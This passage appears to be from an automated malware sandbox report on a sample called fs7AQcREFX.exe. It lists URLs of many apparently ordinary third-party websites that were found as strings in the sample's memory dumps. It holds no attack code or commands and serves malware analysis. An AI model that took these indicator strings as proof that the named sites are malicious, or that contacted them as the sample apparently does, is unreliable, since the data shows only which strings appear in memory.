fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-includes/wlwmanifest.xml
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/31
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.crcsi.org/a
                      Source: fs7AQcREFX.exe, 00000000.00000003.511767622.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619032185.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/
                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.credo.edu.pl/&
                      Source: fs7AQcREFX.exe, 00000000.00000003.630948415.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626959422.000000000615B000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006155000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629290677.000000000615C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dayvo.com/_
                      Source: fs7AQcREFX.exe, 00000000.00000003.391362964.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com//
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/U98
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.depalo.com/h
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/#E
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/.0IT
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com//
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/5
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/7W
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/g
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.505979031.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/rsaenh.dllD
                      Source: fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dgmna.com/z
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com//C
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.domon.com/i
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/U
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.edimart.hu/t
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/_
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.elpro.si/c
                      Source: fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393585434.0000000006191000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/m
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/nJ
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.evcpa.com/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.505979031.0000000006157000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006154000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/2
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/h.dllI
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/om
                      Source: fs7AQcREFX.exe, 00000000.00000002.714421237.0000000000AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/v
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ex-olive.com/z
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fcwcvt.org/~
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fe-bauer.de/%
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/0
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.findbc.com/m
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com//
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/B-
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/E-
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fink.com/G
                      Source: fs7AQcREFX.exe, 00000000.00000003.627176737.0000000000A73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnsds.org/
                      Source: fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/-9
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/;UV
                      Source: fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629394436.00000000061C2000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061C3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630786286.00000000061C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/R
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/er
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/uU
                      Source: fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.629394436.00000000061C2000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630089947.00000000061C3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630786286.00000000061C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fnw.us/v
                      Source: fs7AQcREFX.exe, 00000000.00000003.626687325.00000000061DE000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061DE000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/??V
                      Source: fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/C
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/C?2
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504952373.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/L
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/VJ
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/uJ
                      Source: fs7AQcREFX.exe, 00000000.00000003.503917796.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ftchat.com/x
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/H
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/J
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gpthink.com/X
                      Source: fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.holleman.us/G
                      Source: fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.504000964.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/.0sK
                      Source: fs7AQcREFX.exe, 00000000.00000003.626889052.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/.0x
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/9
                      Source: fs7AQcREFX.exe, 00000000.00000003.617704098.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.562867147.0000000000AF6000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.625818550.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.568147378.0000000000AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.hummer.hu/oK
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/6-b
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iamdirt.com/m&I
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.0000000006187000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.391362964.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.626513177.00000000061B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/.
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/e8
                      Source: fs7AQcREFX.exe, 00000000.00000003.630648067.0000000000AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.item-pr.com/q8
                      Source: fs7AQcREFX.exe, 00000000.00000003.504000964.00000000061B9000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jacomfg.com/U
